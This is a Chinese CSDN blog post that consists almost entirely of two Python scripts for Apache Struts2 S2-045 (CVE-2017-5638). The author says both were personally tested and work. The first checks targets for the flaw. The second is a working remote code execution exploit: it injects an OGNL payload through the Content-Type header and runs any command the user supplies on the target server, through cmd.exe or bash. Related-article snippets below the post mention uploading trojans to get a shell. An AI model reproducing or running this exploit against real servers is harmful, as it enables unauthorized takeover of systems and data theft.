struts2 s2-045漏洞利用poc

最新推荐文章于 2024-05-12 10:00:00 发布
最新推荐文章于 2024-05-12 10:00:00 发布
阅读量6.7k 收藏 2
点赞数
分类专栏: 安全 文章标签: struts2.0 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/isinstance/article/details/61193987
版权

直接上代码了

亲测有用

  • 第一个是检测有没有这个漏洞的
import requests
import sys

def poc(url):

    payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"

    headers = {}
    headers["Content-Type"] = payload
    r = requests.get(url, headers=headers)
    if "105059592" in r.content:
        return True
    return False

if __name__ == '__main__':
    if len(sys.argv) == 1:
        print "python s2-045.py target"
        sys.exit()
    elif poc(sys.argv[1]):
        print "vulnerable"
    else:
        print "not vulnerable"
  • 第二个是利用这个楼洞的
#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib2
import httplib


def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"

    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except httplib.IncompleteRead, e:
        page = e.partial

    print(page)
    return page


if __name__ == '__main__':
    import sys
    if len(sys.argv) != 3:
        print("[*] struts2_S2-045.py <url> <cmd>")
    else:
        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        exploit(url, cmd)
isinstance
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
struts2-045漏洞poc调试
jameson_的专栏
05-24 2009
漏洞概述:struts2默认的上传插件Jakarta Multipart parser的文件上传模块在处理文件上传含(multipart/form-data)的请求时候对异常信息做了捕获,并对异常信息做了OGNL表达式处理。但在在判断Content-Type不正确的时候会抛出异常并且带上Content-Type属性值,可通过构造附带OGNL表达式的URL导致远程代码执行。 漏洞场景: 配置了s
s2-045 java_Struts2爆远程代码执行漏洞(S2-045),附POC | 极安全-JiSec
weixin_36265390的博客
02-12 265
今天凌晨,安全研究员Nike Zheng在Struts2上发现一个高危漏洞(漏洞编号为CVE-2017-5638),当基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行。Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2...
struts2-045 远程代码执行漏洞(CVE-2017-5638)
rumil的博客
06-02 1055
解析了以后,我们借助第三方工具,来进行生成木马文件,然后进行随意上传文件,进行漏洞检测,然后上传木马文件,获取服务器的shell。接下来我们尝试去上传文件(随便上传),然后抓取数据包,修改数据包,然后观察响应数据的变化。观察上传访问路径,进行复制,使用第三方工具(哥斯拉)进行连接。抓取数据包,修改数据包,查看修改后,收到的响应数据。连接成功,进行添加,进入,成功拿到服务器shell。查看是否能够上传成功,观察到已经上传成功。将随意的文件尝试上传,观察url变化。点击文件上传模块,尝试上传木马文件。
盘点那些漏洞 POC 测试工具(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python_0011的博客
05-12 1005
以上工具覆盖肯定不全,还有其他专注 POC 检测的工具,比如知道创宇的 pocsuite3,只随软件携带来十几个案例 POC,目前我使用最多的就是 xray、xpoc、nuclei 这些工具,最近开始用 afrog,大家有好用的工具欢迎留言推荐,一起学习。文库目录:https://wiki.xazlsec.com/static/forder.html—END—黑客&网络安全如何学习1.学习路线图。
Struts2-045漏洞利用工具
08-11
Struts2-045漏洞利用工具
Struts2爆远程代码执行漏洞(S2-045),附POC
weixin_33755847的博客
09-20 924
本文讲的是Struts2爆远程代码执行漏洞(S2-045),附POC, 今天凌晨,安全研究员Nike Zheng在Struts2上发现一个高危漏洞漏洞编号为CVE-2017-5638),当基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个serv...
管道无损检测python_s2-045 无损检测 PoC 分享
weixin_39917291的博客
12-30 242
这次的POC由网上公开的EXP修改而来,主要是由于该EXP具有一定的攻击性,所以我们做了一个无损检测的修改,。附上无损检测POC:#! /usr/bin/env python#coding: utf-8import requestsimport sysheader = dict()header['Content-Type'] = '%{(#nike='multipart/form-data').(...
linux struts2漏洞,重大漏洞预警:Struts 2 远程代码执行漏洞(s2-045\s2-046) (含PoC)
weixin_39612677的博客
05-16 451
背景介绍近日,安全研究人员发现著名J2EE框架——Struts2存在远程代码执行的漏洞Struts2官方已经确认该漏洞(S2-045,S2-046),并定级为高危漏洞Struts2的使用范围及其广泛,国内外均有大量厂商使用该框架。Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立...
Struts S2-045 漏洞调试及分析1
08-03
Struts S2-045漏洞是一个严重的远程代码执行(RCE)漏洞,它发生在Apache Struts2框架中,特别是涉及到文件上传功能时使用Jakarta Multipart解析器的情况。这个漏洞发生在2016年,具体日期为3月9日。漏洞的根源在于...
Struts2-S2-029漏洞分析1
08-08
Struts2-S2-029漏洞是一个严重的问题,它涉及到OGNL(Object-Graph Navigation Language)表达式在Struts2框架中的不安全处理。此漏洞的根本原因是开发人员在处理OGNL表达式中的赋值操作时,错误地编写了判断条件,...
Struts2 s2-061 Poc分析1
08-03
Struts2 s2-061 是一个关于 Apache Struts2 框架的安全漏洞,具体为 OGNL(Object-Graph Navigation Language)表达式注入导致的远程代码执行问题。这个漏洞(CVE-2020-17530)在2020年12月8日被公开,影响了使用...
Struts2-057漏洞检测python脚本
11-04
Struts2-057检测python脚本,支持命令回显,计算和弹计算器
Struts2 S2-029远程代码执行漏洞初探1
08-08
Struts2 S2-029 远程代码执行漏洞初探 Struts2 是一个基于 Java 的 Web 框架,使用 OGNL 表达式来访问 ActionContext 中的对象数据。在 Struts2 中,标签库使用 OGNL 表达式来获取对象数据,例如 `...
S2-045之搬码工复现(含调整后能用的poc代码)
manic_pfy的博客
08-15 1046
S2-045复现(含调整能用的poc代码)概述S2-045官方解释复现过程实验环境Struts项目搭建版本需求漏洞复现脚本代码执行方式代码存在的问题问题解决复现效果漏洞解决方案 概述 写这篇文是因为在系统维护过程,发现安全系统拦截到了这个漏洞。但是网上教程大都简单描述,要不然就是照搬i春秋实验的过程,对于搬码工的我来说,CV操作用不了的,是真的看不懂好吗?i春秋的环境中的文件又不能拷贝出来,你们那...
Struts2 漏洞复现之s2-045
weixin_51220765的博客
12-14 2697
Struts2 漏洞复现之s2-045 原理: 在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 影响版本: Struts 2.3.5 - Struts 2.3.31 Struts 2.5 - Struts 2.5.10 1.进入045 cd vulhub-master/struts2/s2-045 2.开启045 docker-compose up -d
漏洞分析马后炮 s2-045漏洞分析
全栈纸伞
03-09 2789
漏洞分析马后炮 s2-045漏洞分析本文包含如下内容:0x00 目录漏洞分析马后炮 s2-045漏洞分析 0x00 目录 0x01 环境搭建 0x02 PoC分析 0x03 代码DEBUG evaluate0x01 环境搭建现成的符合版本要求的弱环境下载: https://raw.githubusercontent.com/mottoin/S2-045/master/S2-045.war 0x0
S2-045漏洞之简单分析+实战
BlingSmile的博客
04-12 1万+
0X00 前言:尽管s2-045poc已经烂大街了,博主只是想学习了解一下它的用法,顺带写了一个测试小工具。0x01 漏洞简介Apache Struts是一套用于创建企业级Java Web 应用的开源MVC框架 。 Apache Struts 2.3.5 – 2.3.31版本及2.5 – 2.5.10版本存在远程代码执行漏洞(CNNVD-201703-152 ,CVE-2017-5638)。该漏
s2-045漏洞分析
热门推荐
Exploit的小站~
05-10 1万+
这个分析写的我有点汗颜,强烈建议抵制struts2,改为更加可靠的SpringMVC。 背景是,Struts2默认处理multipart报文的解析器是jakarta,是这个组件出现了问题。 该组件定义在了struts-default.xml中,因此,只要不修改parser,并且版本在受影响范围内,肯定是有问题的。 令我非常疑惑的是,一个content-type怎么就能用ognl解析...
s2-045 java_S2-045漏洞初步分析
weixin_39614831的博客
02-22 321
0x01 前言前几天刚分析完s2-032这个漏洞,今天又爆发了一个s2-045漏洞,又是直接的命令执行,影响了struts2绝大多数的版本.官方给的漏洞公告在这里 https://cwiki.apache.org/confluence/display/WW/S2-045受影响版本:Struts 2.3.5 - Struts 2.3.31, Struts 2.5 -Struts 2.5.10其...
漫谈WebLogic-CVE-2020-25511
08-03
漫谈WebLogic-CVE-2020-25511

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值